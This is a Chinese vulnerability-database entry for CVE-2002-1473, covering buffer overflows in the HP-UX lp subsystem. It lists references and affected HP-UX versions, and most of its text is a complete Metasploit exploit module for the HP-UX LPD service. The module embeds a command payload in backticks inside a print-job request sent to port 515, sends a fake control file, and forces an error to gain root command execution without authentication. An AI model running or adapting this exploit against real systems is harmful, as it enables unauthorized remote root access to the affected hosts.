HP-UX lp子系统多个缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106952 漏洞类型 缓冲区溢出
发布时间 2002-08-28 更新时间 2003-04-22
CVE编号 CVE-2002-1473 CNNVD-ID CNNVD-200304-116
漏洞平台 HP-UX CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/10034
https://www.securityfocus.com/bid/89567
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200304-116
|漏洞详情
HP-UX10.20至11.11(11i)的lp子系统存在多个缓冲区溢出漏洞。本地用户可以利用该漏洞导致服务拒绝或可能执行任意代码。
|漏洞EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP-UX LPD Command Execution',
			'Description'    => %q{
				This exploit abuses an unpublished vulnerability in the
				HP-UX LPD service. This flaw allows an unauthenticated
				attacker to execute arbitrary commands with the privileges
				of the root user. The LPD service is only exploitable when
				the address of the attacking system can be resolved by the
				target. This vulnerability was silently patched with the
				buffer overflow flaws addressed in HP Security Bulletin
				HPSBUX0208-213.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-1473'],
					[ 'OSVDB', '9638'],
					[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

				],
			'Platform'       => ['unix', 'hpux'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 200,
					'DisableNops' => true,
					'BadChars'    => "\x00\x09\x20\x2f",
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},			
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# The job ID is squashed down to three decimal digits
		jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# Connect to the LPD service
		connect
		
		print_status("Sending our job request with embedded command string...")
		# Send the job request with the encoded command
		sock.put(
			"\x02" + rand_text_alphanumeric(3) + jid +
			"`" + payload.encoded + "`\n"
		)
		
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our job request")
			return
		end

		print_status("Sending our fake control file...")		
		sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our control file")
			return
		end
		
		print_status("Forcing an error and hijacking the cleanup routine...")
		
		begin
			sock.put(rand_text_alphanumeric(16384))
			disconnect
		rescue
		end
		
	end

end
|受影响的产品
HP HP-UX 11.11 HP HP-UX 11.0 HP HP-UX 10.20
|参考资料

来源:XF
名称:hp-lp-dos(9992)
链接:http://www.iss.net/security_center/static/9992.php
来源:HP
名称:HPSBUX0208-213
链接:http://archives.neohapsis.com/archives/hp/2002-q3/0064.html